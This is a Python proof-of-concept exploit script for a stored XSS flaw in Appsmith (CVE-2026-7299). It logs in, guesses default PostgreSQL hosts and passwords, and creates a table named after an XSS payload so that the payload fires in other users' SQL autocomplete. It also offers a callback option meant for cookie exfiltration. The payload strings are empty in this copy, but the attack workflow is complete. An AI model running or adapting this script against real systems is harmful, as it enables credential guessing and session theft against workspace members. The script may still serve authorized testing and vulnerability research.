#!/usr/bin/env python3
"""
Appsmith Stored XSS via SQL Autocomplete (CVE-2026-7299)

Proof-of-concept driver. Given an Appsmith account it:

1. logs in and creates (or reuses) a workspace and an application,
2. finds or creates a writable PostgreSQL datasource,
3. runs a ``CREATE TABLE`` statement whose table name is the payload string,
4. refreshes the datasource structure so the table name is loaded.

Use only against systems you are authorized to test.
"""

import argparse
import itertools
import json
import random
import string
import sys

import requests
import urllib3

# Length limit the script enforces on payloads (reported to the user as the
# PostgreSQL identifier limit).
MAX_IDENTIFIER_LEN = 63


class C:
    """ANSI escape sequences used to colour terminal output."""

    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    PURPLE = "\033[95m"
    CYAN = "\033[96m"
    WHITE = "\033[97m"
    GREY = "\033[90m"
    BRED = "\033[1;91m"
    BGREEN = "\033[1;92m"
    BYELLOW = "\033[1;93m"
    BBLUE = "\033[1;94m"
    BPURPLE = "\033[1;95m"
    BCYAN = "\033[1;96m"
    BWHITE = "\033[1;97m"
    BOLD = "\033[1m"
    DIM = "\033[2m"
    END = "\033[0m"


class out:
    """Static helpers that print bullet-prefixed, colourised status lines.

    ``level`` controls the left padding of each line.
    """

    @staticmethod
    def _pad(level):
        return " " * level

    @staticmethod
    def success(msg, level=1):
        print(f"{out._pad(level)}{C.BGREEN}\u2022{C.END} {msg}")

    @staticmethod
    def error(msg, level=1):
        print(f"{out._pad(level)}{C.BRED}\u2022{C.END} {C.RED}{msg}{C.END}")

    @staticmethod
    def warn(msg, level=1):
        print(f"{out._pad(level)}{C.BYELLOW}\u2022{C.END} {C.YELLOW}{msg}{C.END}")

    @staticmethod
    def info(msg, level=1):
        print(f"{out._pad(level)}{C.BCYAN}\u2022{C.END} {msg}")

    @staticmethod
    def step(msg, level=1):
        print(f"{out._pad(level)}{C.BPURPLE}\u2022{C.END} {msg}")

    @staticmethod
    def detail(label, value, level=2):
        print(f"{out._pad(level)}{C.GREY}\u2022 {label}:{C.END} {value}")

    @staticmethod
    def dim(msg, level=2):
        print(f"{out._pad(level)}{C.GREY}\u2022 {msg}{C.END}")

    @staticmethod
    def progress(msg, level=2):
        """Rewrite the current terminal line in place (no trailing newline)."""
        pad = out._pad(level)
        # "\r" returns to column 0 and "\033[K" erases the rest of the line.
        sys.stdout.write(f"\r{pad}{C.GREY}\u2022 {msg}{C.END}\033[K")
        sys.stdout.flush()

    @staticmethod
    def blank():
        print()


# NOTE(review): the spacing inside each art row is reproduced as found in this
# copy of the file; it may have been collapsed - confirm against the original.
BANNER = f'''
{C.PURPLE}M""MMMM""M MP""""""`MM MP""""""`MM {C.END} {C.BOLD} MP""""""`MM M"""""`'"""`YM M""M M""""""""M M""MMMMM""MM
{C.PURPLE}M `MM' M M mmmmm..M M mmmmm..M {C.END} {C.BOLD}M mmmmm..M M mm. mm. M M M Mmmm mmmM M MMMMM MM
{C.PURPLE}MM. .MM M. `YM M. `YM {C.END} {C.BOLD}M. `YM M MMM MMM M M M MMMM MMMM M `M
{C.PURPLE}M .mm. M MMMMMMM. M MMMMMMM. M {C.END} {C.BOLD}MMMMMMM. M M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}M MMMM M M. .MMM' M M. .MMM' M {C.END} {C.BOLD}M. .MMM' M M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}M MMMM M Mb. .dM Mb. .dM {C.END} {C.BOLD}Mb. .dM M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}MMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMM {C.END} {C.BOLD}MMMMMMMMMMM MMMMMMMMMMMMMM MMMM MMMMMMMMMM MMMMMMMMMMMM
{C.BGREEN}@stuub{C.END}
Exploiting CVE-2026-7299
Stored XSS - Appsmith v1.98
'''

# NOTE(review): the default payload is an empty string in this copy of the
# file; it is left untouched here.
PAYLOADS = {
    "alert": '',
}


class AppsmithExploit:
    """Session wrapper around the Appsmith REST endpoints this script calls.

    Holds one ``requests.Session`` plus the most recent XSRF token. Most
    methods print progress through ``out`` and call ``sys.exit(1)`` on an
    unrecoverable API error.
    """

    # Candidate connection parameters tried by auto_discover_datasource()
    # whenever the caller does not supply the corresponding value.
    dfl_db_hosts = [
        "host.docker.internal",
        "172.17.0.1",
        "postgres",
        "postgresql",
        "db",
        "database",
        "appsmith-pg",
        "localhost",
    ]
    dfl_db_ports = [5432]
    dfl_db_names = ["postgres", "testdb", "appsmith"]
    dfl_db_user = ["postgres", "appsmith", "admin"]
    dfl_db_pass = ["postgres", "password", "test123", "appsmith", "admin"]

    # Seconds to wait on any HTTP call that does not pass its own timeout;
    # without one, requests blocks indefinitely on an unresponsive server.
    DEFAULT_TIMEOUT = 30

    def __init__(self, base_url, email, password, verify_ssl=False,
                 timeout=DEFAULT_TIMEOUT):
        """Store credentials and prepare the HTTP session.

        Args:
            base_url: Appsmith base URL; a trailing slash is stripped.
            email: Account e-mail used to log in.
            password: Account password.
            verify_ssl: Whether the session verifies TLS certificates.
            timeout: Default per-request timeout in seconds.
        """
        self.base_url = base_url.rstrip("/")
        self.email = email
        self.password = password
        self.timeout = timeout
        self.session = requests.Session()
        self.session.verify = verify_ssl
        self.xsrf_token = None
        if not verify_ssl:
            # Only silence the insecure-request warning when verification was
            # actually turned off, instead of globally at import time.
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # ------------------------------------------------------------------
    # HTTP plumbing
    # ------------------------------------------------------------------
    def _headers(self):
        """Return JSON request headers, including the XSRF token if known."""
        h = {"Content-Type": "application/json"}
        if self.xsrf_token:
            h["X-XSRF-TOKEN"] = self.xsrf_token
        return h

    def _update_xsrf(self, response):
        """Remember the XSRF-TOKEN cookie of *response*, if it set one."""
        token = response.cookies.get("XSRF-TOKEN")
        if token:
            self.xsrf_token = token

    def _request(self, method, path, **kwargs):
        """Send *method* to ``base_url + path`` and track the XSRF token.

        Applies ``self.timeout`` unless the caller passes ``timeout``.
        Raises ``requests.RequestException`` on transport failure.
        """
        kwargs.setdefault("timeout", self.timeout)
        response = self.session.request(method, f"{self.base_url}{path}", **kwargs)
        self._update_xsrf(response)
        return response

    @staticmethod
    def _payload(response):
        """Return the JSON object in *response*, or ``{}`` if there is none."""
        try:
            body = response.json()
        except ValueError:
            return {}
        return body if isinstance(body, dict) else {}

    @classmethod
    def _data(cls, response):
        """Return the ``data`` member of the JSON body (``None`` if absent)."""
        return cls._payload(response).get("data")

    # ------------------------------------------------------------------
    # Workflow steps
    # ------------------------------------------------------------------
    def login(self):
        """Log in with the stored credentials and return the user record.

        Exits with status 1 if the login request is rejected or the session
        is still reported as anonymous afterwards.
        """
        out.step("Authenticating...")

        # Unauthenticated request first, so that any XSRF-TOKEN cookie it sets
        # can be echoed back in the login form post below.
        self._request("GET", "/api/v1/users/me")

        r = self._request(
            "POST",
            "/api/v1/login",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "X-XSRF-TOKEN": self.xsrf_token or "",
            },
            data={"username": self.email, "password": self.password},
            allow_redirects=False,
        )
        if r.status_code not in (200, 301, 302):
            out.error("Login failed", level=2)
            out.dim(r.text[:200])
            sys.exit(1)

        r = self._request("GET", "/api/v1/users/me", headers=self._headers())
        profile = self._data(r)
        if not isinstance(profile, dict) or profile.get("isAnonymous", True):
            out.error("Login failed, still anonymous", level=2)
            sys.exit(1)

        email = profile.get("email", "unknown")
        out.success(f"Authenticated as {C.BGREEN}{email}{C.END}", level=2)
        return profile

    def get_workspace_context(self):
        """Create a workspace and an application; return their identifiers.

        Falls back to the first workspace listed by ``/workspaces/home`` when
        workspace creation is refused.

        Returns:
            Tuple ``(workspace_id, app_id, page_id)``.
        """
        suffix = "".join(random.choices(string.ascii_lowercase + string.digits, k=6))
        out.step("Setting up workspace...")

        r = self._request(
            "POST",
            "/api/v1/workspaces",
            headers=self._headers(),
            json={"name": f"poc-{suffix}"},
        )
        if r.status_code in (200, 201):
            workspace = self._data(r)
            if not isinstance(workspace, dict):
                out.error("Unexpected workspace creation response", level=2)
                sys.exit(1)
        else:
            out.warn(f"Workspace creation failed ({r.status_code}), using existing", level=2)
            r = self._request("GET", "/api/v1/workspaces/home", headers=self._headers())
            workspaces = self._data(r) or []
            if not workspaces:
                out.error("No workspaces found", level=2)
                sys.exit(1)
            workspace = workspaces[0]

        workspace_id = workspace["id"]
        out.success(f"Workspace {C.BWHITE}{workspace.get('name', 'N/A')}{C.END}", level=2)

        r = self._request(
            "POST",
            "/api/v1/applications",
            headers=self._headers(),
            json={"name": f"app-{suffix}", "workspaceId": workspace_id},
        )
        app = self._data(r)
        if r.status_code not in (200, 201) or not isinstance(app, dict):
            out.error(f"Failed to create application: {r.status_code}", level=2)
            sys.exit(1)

        app_id = app["id"]
        pages = app.get("pages") or []
        if not pages:
            out.error("No pages found", level=2)
            sys.exit(1)
        page_id = pages[0].get("id") or pages[0].get("baseId")
        out.success(f"Application {C.BWHITE}{app.get('name', 'N/A')}{C.END}", level=2)
        return workspace_id, app_id, page_id

    def find_postgres_datasource(self, workspace_id):
        """Return the first PostgreSQL datasource with a READ_WRITE storage.

        A storage whose configuration carries no connection mode is treated
        as READ_WRITE. Returns ``None`` when the listing fails or nothing
        matches.
        """
        out.step("Searching for writable PostgreSQL datasources...")
        r = self._request(
            "GET",
            f"/api/v1/datasources?workspaceId={workspace_id}",
            headers=self._headers(),
        )
        resp = self._payload(r)
        if (resp.get("responseMeta") or {}).get("status") != 200:
            out.warn("Datasource listing failed", level=2)
            return None

        for ds in resp.get("data") or []:
            if (ds.get("pluginName") or "").lower() != "postgresql":
                continue
            storages = ds.get("datasourceStorages") or {}
            for storage in storages.values():
                config = storage.get("datasourceConfiguration") or {}
                mode = (config.get("connection") or {}).get("mode", "READ_WRITE")
                if mode == "READ_WRITE":
                    out.success(f"Found {C.BCYAN}{ds['name']}{C.END}", level=2)
                    return ds
            out.dim(f"{ds['name']} is READ_ONLY, skipping", level=2)

        out.warn("No writable PostgreSQL datasource found", level=2)
        return None

    def test_datasource_connection(self, plugin_id, workspace_id, host, port,
                                   db_name, username, password):
        """Ask the server to test one connection; return True on success.

        Transport errors and unparsable responses count as a failed test.
        """
        payload = {
            "pluginId": plugin_id,
            "datasourceConfiguration": {
                "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
                "endpoints": [{"host": host, "port": port}],
                "authentication": {
                    "databaseName": db_name,
                    "username": username,
                    "password": password,
                },
                "properties": [None, {"key": "Connection method", "value": "STANDARD"}],
            },
            "workspaceId": workspace_id,
        }
        headers = self._headers()
        headers["X-Appsmith-EnvironmentId"] = "unused_env"
        try:
            r = self._request(
                "POST",
                "/api/v1/datasources/test",
                headers=headers,
                json=payload,
                timeout=10,
            )
        except (requests.RequestException, ValueError):
            return False
        result = self._data(r)
        if not isinstance(result, dict):
            return False
        return result.get("success", False)

    def auto_discover_datasource(self, workspace_id, db_host=None, db_port=None,
                                 db_name=None, db_user=None, db_pass=None):
        """Try connection combinations and create a datasource from the first hit.

        Every argument left as ``None`` is replaced by the matching ``dfl_db_*``
        class list. Exits with status 1 when no combination succeeds.
        """
        out.step("Auto-discovering PostgreSQL connection...")
        plugin_id = self.get_postgres_plugin_id(workspace_id)

        hosts = [db_host] if db_host else self.dfl_db_hosts
        ports = [db_port] if db_port else self.dfl_db_ports
        names = [db_name] if db_name else self.dfl_db_names
        users = [db_user] if db_user else self.dfl_db_user
        passes = [db_pass] if db_pass else self.dfl_db_pass

        # product() varies the right-most iterable fastest, i.e. the same
        # order as nested host/port/name/user/password loops.
        for host, port, name, user, pwd in itertools.product(
                hosts, ports, names, users, passes):
            combo = f"{user}:{pwd}@{host}:{port}/{name}"
            out.progress(f"Trying {combo:<50}")
            if self.test_datasource_connection(
                    plugin_id, workspace_id, host, port, name, user, pwd):
                print()  # terminate the in-place progress line
                out.success(f"Connection found {C.BGREEN}{combo}{C.END}", level=2)
                return self.create_datasource(
                    workspace_id, host, port, name, user, pwd, plugin_id=plugin_id)

        print()
        out.error("No valid PostgreSQL connection found", level=2)
        out.dim("Provide credentials with --db-host, --db-user, --db-pass, --db-name")
        sys.exit(1)

    def get_postgres_plugin_id(self, workspace_id):
        """Return the id of the first plugin whose name or package mentions postgres.

        Exits with status 1 when no such plugin is listed.
        """
        r = self._request(
            "GET",
            f"/api/v1/plugins?workspaceId={workspace_id}",
            headers=self._headers(),
        )
        for p in self._data(r) or []:
            pname = (p.get("name") or "").lower()
            pkg = (p.get("packageName") or "").lower()
            if "postgres" in pname or "postgres" in pkg:
                return p["id"]
        out.error("PostgreSQL plugin not found", level=2)
        sys.exit(1)

    def create_datasource(self, workspace_id, db_host, db_port, db_name,
                          db_user, db_pass, plugin_id=None):
        """Create a READ_WRITE PostgreSQL datasource and return its record.

        Args:
            plugin_id: Optional already-resolved plugin id; looked up via
                get_postgres_plugin_id() when omitted.

        Exits with status 1 unless the server answers 201 with a JSON object.
        """
        out.step(f"Creating datasource {C.BWHITE}{db_host}:{db_port}/{db_name}{C.END}", level=2)
        if plugin_id is None:
            plugin_id = self.get_postgres_plugin_id(workspace_id)

        payload = {
            "pluginId": plugin_id,
            "datasourceStorages": {
                "unused_env": {
                    "datasourceConfiguration": {
                        "properties": [
                            None,
                            {"key": "Connection method", "value": "STANDARD"},
                        ],
                        "connection": {
                            "mode": "READ_WRITE",
                            "ssl": {"authType": "DEFAULT"},
                        },
                        "endpoints": [{"port": str(db_port), "host": db_host}],
                        "sshProxy": {"endpoints": [{"port": "22"}]},
                        "authentication": {
                            "databaseName": db_name,
                            "username": db_user,
                            "password": db_pass,
                        },
                        "url": "",
                    },
                    "datasourceId": "",
                    "environmentId": "unused_env",
                    "isConfigured": True,
                }
            },
            "name": f"ds-{workspace_id[:8]}",
            "workspaceId": workspace_id,
        }
        r = self._request("POST", "/api/v1/datasources",
                          headers=self._headers(), json=payload)
        ds = self._data(r)
        if r.status_code != 201 or not isinstance(ds, dict):
            out.error(f"Failed to create datasource: {r.status_code}", level=3)
            out.dim(r.text[:300], level=3)
            sys.exit(1)

        out.success(f"Datasource created {C.GREY}({ds['id']}){C.END}", level=3)
        return ds

    def create_action(self, datasource, app_id, page_id, workspace_id, xss_payload):
        """Create a query action whose SQL creates a table named *xss_payload*.

        Returns the new action id; exits with status 1 on failure.
        """
        out.step("Injecting XSS payload...")
        sql = f'CREATE TABLE "{xss_payload}" (id serial primary key);'
        payload = {
            "applicationId": app_id,
            "workspaceId": workspace_id,
            "pluginType": "DB",
            "pluginId": datasource["pluginId"],
            "datasource": {
                "id": datasource["id"],
                "name": datasource["name"],
                "pluginId": datasource["pluginId"],
            },
            "pageId": page_id,
            "actionConfiguration": {
                "timeoutInMillisecond": 10000,
                "paginationType": "NONE",
                "encodeParamsToggle": True,
                "pluginSpecifiedTemplates": [{"value": True}],
                "body": sql,
            },
            "name": "xss_poc_query",
        }
        r = self._request("POST", "/api/v1/actions",
                          headers=self._headers(), json=payload)
        action = self._data(r)
        if r.status_code not in (200, 201) or not isinstance(action, dict):
            out.error(f"Failed to create action: {r.status_code}", level=2)
            out.dim(r.text[:500], level=2)
            sys.exit(1)

        out.success(f"Action created {C.GREY}({action['id']}){C.END}", level=2)
        out.detail("SQL", f"{C.BWHITE}{sql}{C.END}")
        return action["id"]

    def execute_action(self, action_id):
        """Execute the stored action; return True if the server reports success.

        An "already exists" error is reported as a warning and returns False;
        any other failure exits with status 1.
        """
        out.step("Executing query...", level=2)
        execute_dto = json.dumps({
            "actionId": action_id,
            "viewMode": False,
            "paramProperties": {},
        })
        # The multipart body is assembled by hand with a fixed boundary that
        # matches the Content-Type header below.
        body = (
            f"------ExploitBoundary\r\n"
            f'Content-Disposition: form-data; name="executeActionDTO"\r\n'
            f"\r\n"
            f"{execute_dto}\r\n"
            f"------ExploitBoundary--\r\n"
        )
        headers = {
            "Content-Type": "multipart/form-data; boundary=----ExploitBoundary",
            "X-Appsmith-EnvironmentId": "unused_env",
        }
        if self.xsrf_token:
            headers["X-XSRF-TOKEN"] = self.xsrf_token

        r = self._request("POST", "/api/v1/actions/execute",
                          headers=headers, data=body.encode())
        if r.status_code != 200:
            out.error(f"Execution failed: {r.status_code}", level=3)
            sys.exit(1)

        outcome = self._data(r)
        if not isinstance(outcome, dict):
            outcome = {}
        success = outcome.get("isExecutionSuccess", False)
        if success:
            out.success("Malicious table created", level=3)
        else:
            error = outcome.get("body", "Unknown error")
            if "already exists" in str(error):
                out.warn("Table already exists (payload previously injected)", level=3)
            else:
                out.error(f"Query error: {error}", level=3)
                sys.exit(1)
        return success

    def refresh_structure(self, datasource_id):
        """Re-fetch the datasource structure with the cache bypassed.

        Prints the table count and any table name containing ``<`` or
        ``onerror``. Always returns True.
        """
        out.step("Refreshing datasource structure...")
        r = self._request(
            "GET",
            f"/api/v1/datasources/{datasource_id}/structure?ignoreCache=true",
            headers=self._headers(),
        )
        if r.status_code != 200:
            out.warn(f"Structure refresh returned {r.status_code}", level=2)
            return True

        structure = self._data(r)
        tables = (structure.get("tables") if isinstance(structure, dict) else None) or []
        out.success(f"{C.BWHITE}{len(tables)}{C.END} tables loaded into autocomplete", level=2)
        for t in tables:
            name = t.get("name", "")
            if "<" in name or "onerror" in name:
                out.success(f"Poisoned table: {C.BGREEN}{name[:70]}{C.END}", level=2)
        return True

    def run(self, xss_payload, db_host=None, db_port=None, db_name=None,
            db_user=None, db_pass=None):
        """Run the whole workflow: login, setup, datasource, inject, refresh."""
        self.login()
        out.blank()

        workspace_id, app_id, page_id = self.get_workspace_context()
        out.blank()

        ds = self.find_postgres_datasource(workspace_id)
        if not ds:
            ds = self.auto_discover_datasource(
                workspace_id, db_host, db_port, db_name, db_user, db_pass)
        out.blank()

        action_id = self.create_action(ds, app_id, page_id, workspace_id, xss_payload)
        self.execute_action(action_id)
        out.blank()

        self.refresh_structure(ds["id"])
        out.blank()

        out.success(f"{C.BGREEN}Exploit complete{C.END}")
        out.dim("XSS payload stored as a database table name.")
        out.dim("Fires when a workspace member triggers SQL autocomplete.")
        out.blank()
        out.detail("Trigger", f"Type {C.BWHITE}SELECT * FROM{C.END} in the SQL editor")
        out.detail("Payload", f"{C.BWHITE}{xss_payload}{C.END}")
        out.detail("Datasource", f"{C.BWHITE}{ds['name']}{C.END} {C.GREY}({ds['id']}){C.END}")
        out.blank()


def main():
    """Parse command-line arguments, choose the payload and run the workflow."""
    print(BANNER)
    parser = argparse.ArgumentParser(
        description="CVE-2026-7299 - Appsmith Stored XSS via SQL Autocomplete")
    parser.add_argument("-u", "--url", required=True,
                        help="Appsmith base URL (e.g. http://localhost:4444)")
    parser.add_argument("-e", "--email", required=True,
                        help="Attacker's Appsmith email")
    parser.add_argument("-p", "--password", required=True,
                        help="Attacker's Appsmith password")
    parser.add_argument("-c", "--callback-url",
                        help="Callback URL for cookie exfiltration")
    parser.add_argument("-x", "--custom-payload",
                        help="Custom XSS payload string")
    parser.add_argument("-H", "--db-host", help="PostgreSQL host")
    parser.add_argument("-P", "--db-port", type=int, default=5432,
                        help="PostgreSQL port (default: 5432)")
    parser.add_argument("-d", "--db-name", help="PostgreSQL database name")
    parser.add_argument("-U", "--db-user", help="PostgreSQL username")
    parser.add_argument("-W", "--db-pass", help="PostgreSQL password")
    parser.add_argument("-k", "--no-verify-ssl", action="store_true",
                        help="Disable SSL verification")
    args = parser.parse_args()

    if args.custom_payload:
        xss_payload = args.custom_payload
        if len(xss_payload) > MAX_IDENTIFIER_LEN:
            out.warn(f"Custom payload is {len(xss_payload)} chars "
                     f"(PostgreSQL limit: {MAX_IDENTIFIER_LEN})")
            out.dim("Payload will be truncated by the database")
    elif args.callback_url:
        cb = args.callback_url.rstrip("/")
        short_cb = cb.replace("https://", "//").replace("http://", "//")
        # NOTE(review): the three payload templates (and the template measured
        # for max_url below) are empty strings in this copy of the file. They
        # are left as found, so this branch currently always ends in the
        # "too long" error. The selection loop keeps the LAST candidate that
        # fits; confirm the intended ordering before adding a break.
        candidates = [
            "",
            "",
            "",
        ]
        xss_payload = None
        for c in candidates:
            if len(c) <= MAX_IDENTIFIER_LEN:
                xss_payload = c
        if not xss_payload:
            max_url = MAX_IDENTIFIER_LEN - len("")
            out.error("Callback URL too long for PostgreSQL 63-char identifier limit")
            out.dim(f"Max URL length: ~{max_url} chars (yours: {len(short_cb)})")
            out.dim("Use port 80 or a short domain/ngrok URL")
            sys.exit(1)
        out.info(f"Callback: {C.BWHITE}{xss_payload}{C.END} "
                 f"{C.GREY}({len(xss_payload)}/{MAX_IDENTIFIER_LEN}){C.END}")
    else:
        xss_payload = PAYLOADS["alert"]

    out.blank()
    exploit = AppsmithExploit(
        base_url=args.url,
        email=args.email,
        password=args.password,
        verify_ssl=not args.no_verify_ssl,
    )
    try:
        exploit.run(
            xss_payload=xss_payload,
            db_host=args.db_host,
            db_port=args.db_port,
            db_name=args.db_name,
            db_user=args.db_user,
            db_pass=args.db_pass,
        )
    except requests.RequestException as exc:
        # Connection failures and timeouts end the run with a message rather
        # than a traceback.
        out.error(f"Request failed: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n\n {C.BYELLOW}\u2022{C.END} {C.GREY}Interrupted.{C.END}\n")
        sys.exit(0)